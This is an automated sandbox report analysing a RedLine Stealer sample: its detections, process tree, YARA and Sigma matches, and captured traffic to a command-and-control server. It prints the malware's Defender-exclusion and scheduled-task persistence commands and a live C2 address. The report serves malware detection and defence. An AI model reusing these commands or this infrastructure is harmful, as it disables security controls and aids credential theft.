Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
tfF3UBTdr8.exe

Overview

General Information

Sample name:tfF3UBTdr8.exe
renamed because original name is a hash value
Original sample name:05211f48dbbb4ef891db1e158ff87e28.exe
Analysis ID:1501611
MD5:05211f48dbbb4ef891db1e158ff87e28
SHA1:20d0d8cea312fbca71dd0c00a97a0c346f886628
SHA256:1d614e39746dfc7e2fd8e4d133c5609ce9cc67f80e6468ea189683fca168cdd6
Tags:exeRedLineStealer
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected RedLine Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • tfF3UBTdr8.exe (PID: 6532 cmdline: "C:\Users\user\Desktop\tfF3UBTdr8.exe" MD5: 05211F48DBBB4EF891DB1E158FF87E28)
    • powershell.exe (PID: 5284 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\tfF3UBTdr8.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2508 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WltfeVzR.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 5800 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WltfeVzR" /XML "C:\Users\user\AppData\Local\Temp\tmp8652.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 3436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 5800 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • tfF3UBTdr8.exe (PID: 1492 cmdline: "C:\Users\user\Desktop\tfF3UBTdr8.exe" MD5: 05211F48DBBB4EF891DB1E158FF87E28)
      • conhost.exe (PID: 2848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • WltfeVzR.exe (PID: 1868 cmdline: C:\Users\user\AppData\Roaming\WltfeVzR.exe MD5: 05211F48DBBB4EF891DB1E158FF87E28)
    • schtasks.exe (PID: 5912 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WltfeVzR" /XML "C:\Users\user\AppData\Local\Temp\tmpAD91.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 3116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WltfeVzR.exe (PID: 6784 cmdline: "C:\Users\user\AppData\Roaming\WltfeVzR.exe" MD5: 05211F48DBBB4EF891DB1E158FF87E28)
      • conhost.exe (PID: 6716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["185.222.57.91:55615"], "Bot Id": "cheat"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000009.00000002.2204991581.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000009.00000002.2204991581.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          00000009.00000002.2204991581.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_f54632ebunknownunknown
          • 0x133ca:$a4: get_ScannedWallets
          • 0x12228:$a5: get_ScanTelegram
          • 0x1304e:$a6: get_ScanGeckoBrowsersPaths
          • 0x10e6a:$a7: <Processes>k__BackingField
          • 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
          • 0x1079e:$a9: <ScanFTP>k__BackingField
          0000000B.00000002.2196920043.0000000004141000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0000000B.00000002.2196920043.0000000004141000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              Click to see the 17 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              11.2.WltfeVzR.exe.4159340.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                11.2.WltfeVzR.exe.4159340.1.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  11.2.WltfeVzR.exe.4159340.1.unpackWindows_Trojan_RedLineStealer_f54632ebunknownunknown
                  • 0x117ca:$a4: get_ScannedWallets
                  • 0x10628:$a5: get_ScanTelegram
                  • 0x1144e:$a6: get_ScanGeckoBrowsersPaths
                  • 0xf26a:$a7: <Processes>k__BackingField
                  • 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
                  • 0xeb9e:$a9: <ScanFTP>k__BackingField
                  11.2.WltfeVzR.exe.4159340.1.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                  • 0xe68a:$u7: RunPE
                  • 0x11d41:$u8: DownloadAndEx
                  • 0x7330:$pat14: , CommandLine:
                  • 0x11279:$v2_1: ListOfProcesses
                  • 0xe88b:$v2_2: get_ScanVPN
                  • 0xe92e:$v2_2: get_ScanFTP
                  • 0xf61e:$v2_2: get_ScanDiscord
                  • 0x1060c:$v2_2: get_ScanSteam
                  • 0x10628:$v2_2: get_ScanTelegram
                  • 0x106ce:$v2_2: get_ScanScreen
                  • 0x11416:$v2_2: get_ScanChromeBrowsersPaths
                  • 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths
                  • 0x11709:$v2_2: get_ScanBrowsers
                  • 0x117ca:$v2_2: get_ScannedWallets
                  • 0x117f0:$v2_2: get_ScanWallets
                  • 0x11810:$v2_3: GetArguments
                  • 0xfed9:$v2_4: VerifyUpdate
                  • 0x147ea:$v2_4: VerifyUpdate
                  • 0x11bca:$v2_5: VerifyScanRequest
                  • 0x112c6:$v2_6: GetUpdates
                  • 0x147cb:$v2_6: GetUpdates
                  9.2.tfF3UBTdr8.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 31 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Potentially Suspicious PowerShell Child Processes
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WltfeVzR" /XML "C:\Users\user\AppData\Local\Temp\tmp8652.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WltfeVzR" /XML "C:\Users\user\AppData\Local\Temp\tmp8652.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WltfeVzR.exe", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2508, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WltfeVzR" /XML "C:\Users\user\AppData\Local\Temp\tmp8652.tmp", ProcessId: 5800, ProcessName: schtasks.exe
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\tfF3UBTdr8.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\tfF3UBTdr8.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\tfF3UBTdr8.exe", ParentImage: C:\Users\user\Desktop\tfF3UBTdr8.exe, ParentProcessId: 6532, ParentProcessName: tfF3UBTdr8.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\tfF3UBTdr8.exe", ProcessId: 5284, ProcessName: powershell.exe
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\tfF3UBTdr8.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\tfF3UBTdr8.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\tfF3UBTdr8.exe", ParentImage: C:\Users\user\Desktop\tfF3UBTdr8.exe, ParentProcessId: 6532, ParentProcessName: tfF3UBTdr8.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\tfF3UBTdr8.exe", ProcessId: 5284, ProcessName: powershell.exe
                    Sigma detected: Suspicious Add Scheduled Task Parent
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WltfeVzR" /XML "C:\Users\user\AppData\Local\Temp\tmpAD91.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WltfeVzR" /XML "C:\Users\user\AppData\Local\Temp\tmpAD91.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\WltfeVzR.exe, ParentImage: C:\Users\user\AppData\Roaming\WltfeVzR.exe, ParentProcessId: 1868, ParentProcessName: WltfeVzR.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WltfeVzR" /XML "C:\Users\user\AppData\Local\Temp\tmpAD91.tmp", ProcessId: 5912, ProcessName: schtasks.exe
                    Sigma detected: Suspicious Schtasks From Env Var Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WltfeVzR" /XML "C:\Users\user\AppData\Local\Temp\tmp8652.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WltfeVzR" /XML "C:\Users\user\AppData\Local\Temp\tmp8652.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WltfeVzR.exe", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2508, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WltfeVzR" /XML "C:\Users\user\AppData\Local\Temp\tmp8652.tmp", ProcessId: 5800, ProcessName: schtasks.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\tfF3UBTdr8.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\tfF3UBTdr8.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\tfF3UBTdr8.exe", ParentImage: C:\Users\user\Desktop\tfF3UBTdr8.exe, ParentProcessId: 6532, ParentProcessName: tfF3UBTdr8.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\tfF3UBTdr8.exe", ProcessId: 5284, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    barindex
                    Sigma detected: Scheduled temp file as task from temp location
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WltfeVzR" /XML "C:\Users\user\AppData\Local\Temp\tmp8652.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WltfeVzR" /XML "C:\Users\user\AppData\Local\Temp\tmp8652.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WltfeVzR.exe", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2508, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WltfeVzR" /XML "C:\Users\user\AppData\Local\Temp\tmp8652.tmp", ProcessId: 5800, ProcessName: schtasks.exe

                    Suricata Signatures

                    Timestamp:2024-08-30T08:02:02.637313+0200
                    SID:2849662
                    Severity:1
                    Source Port:49711
                    Destination Port:55615
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-30T08:02:17.981040+0200
                    SID:2849351
                    Severity:1
                    Source Port:49718
                    Destination Port:55615
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-30T08:02:11.528172+0200
                    SID:2849352
                    Severity:1
                    Source Port:49714
                    Destination Port:55615
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-30T08:02:20.454579+0200
                    SID:2045001
                    Severity:1
                    Source Port:55615
                    Destination Port:49718
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-30T08:02:20.867312+0200
                    SID:2849352
                    Severity:1
                    Source Port:49723
                    Destination Port:55615
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-30T08:02:18.122869+0200
                    SID:2046056
                    Severity:1
                    Source Port:55615
                    Destination Port:49718
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-08-30T08:02:11.112782+0200
                    SID:2045001
                    Severity:1
                    Source Port:55615
                    Destination Port:49711
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-30T08:02:07.909323+0200
                    SID:2045000
                    Severity:1
                    Source Port:55615
                    Destination Port:49711
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-30T08:02:12.923279+0200
                    SID:2849662
                    Severity:1
                    Source Port:49718
                    Destination Port:55615
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-30T08:02:08.278319+0200
                    SID:2849351
                    Severity:1
                    Source Port:49711
                    Destination Port:55615
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-30T08:02:17.772516+0200
                    SID:2045000
                    Severity:1
                    Source Port:55615
                    Destination Port:49718
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-30T08:02:22.423218+0200
                    SID:2848200
                    Severity:1
                    Source Port:49724
                    Destination Port:55615
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-30T08:02:08.366718+0200
                    SID:2046056
                    Severity:1
                    Source Port:55615
                    Destination Port:49711
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 0.2.tfF3UBTdr8.exe.4210970.1.raw.unpackMalware Configuration Extractor: RedLine {"C2 url": ["185.222.57.91:55615"], "Bot Id": "cheat"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeReversingLabs: Detection: 68%
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeVirustotal: Detection: 45%Perma Link
                    Multi AV Scanner detection for submitted file
                    Source: tfF3UBTdr8.exeReversingLabs: Detection: 68%
                    Source: tfF3UBTdr8.exeVirustotal: Detection: 45%Perma Link
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for sample
                    Source: tfF3UBTdr8.exeJoe Sandbox ML: detected
                    Source: tfF3UBTdr8.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: tfF3UBTdr8.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: tfF3UBTdr8.exe, 00000009.00000002.2206038286.0000000001595000.00000004.00000020.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeCode function: 4x nop then jmp 076BA9E8h0_2_076BA9E0
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeCode function: 4x nop then jmp 076C9C38h11_2_076C9C30

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.5:49711 -> 185.222.57.91:55615
                    Source: Network trafficSuricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 185.222.57.91:55615 -> 192.168.2.5:49711
                    Source: Network trafficSuricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.5:49711 -> 185.222.57.91:55615
                    Source: Network trafficSuricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 185.222.57.91:55615 -> 192.168.2.5:49711
                    Source: Network trafficSuricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 185.222.57.91:55615 -> 192.168.2.5:49711
                    Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.5:49718 -> 185.222.57.91:55615
                    Source: Network trafficSuricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 185.222.57.91:55615 -> 192.168.2.5:49718
                    Source: Network trafficSuricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.5:49718 -> 185.222.57.91:55615
                    Source: Network trafficSuricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 185.222.57.91:55615 -> 192.168.2.5:49718
                    Source: Network trafficSuricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 185.222.57.91:55615 -> 192.168.2.5:49718
                    Source: Network trafficSuricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.5:49714 -> 185.222.57.91:55615
                    Source: Network trafficSuricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.5:49723 -> 185.222.57.91:55615
                    Source: Network trafficSuricata IDS: 2848200 - Severity 1 - ETPRO MALWARE RedLine - GetUpdates Request : 192.168.2.5:49724 -> 185.222.57.91:55615
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: 185.222.57.91:55615
                    Uses known network protocols on non-standard ports
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49711
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49711
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49711
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49711
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49714
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49718
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49718
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49714
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49718
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49718
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49723
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49724
                    Source: global trafficTCP traffic: 192.168.2.5:49711 -> 185.222.57.91:55615
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.57.91:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.222.57.91:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.222.57.91:55615Content-Length: 953303Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.57.91:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.222.57.91:55615Content-Length: 953295Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.222.57.91:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.222.57.91:55615Content-Length: 952830Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.222.57.91:55615Content-Length: 952822Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: Joe Sandbox ViewASN Name: ROOTLAYERNETNL ROOTLAYERNETNL
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
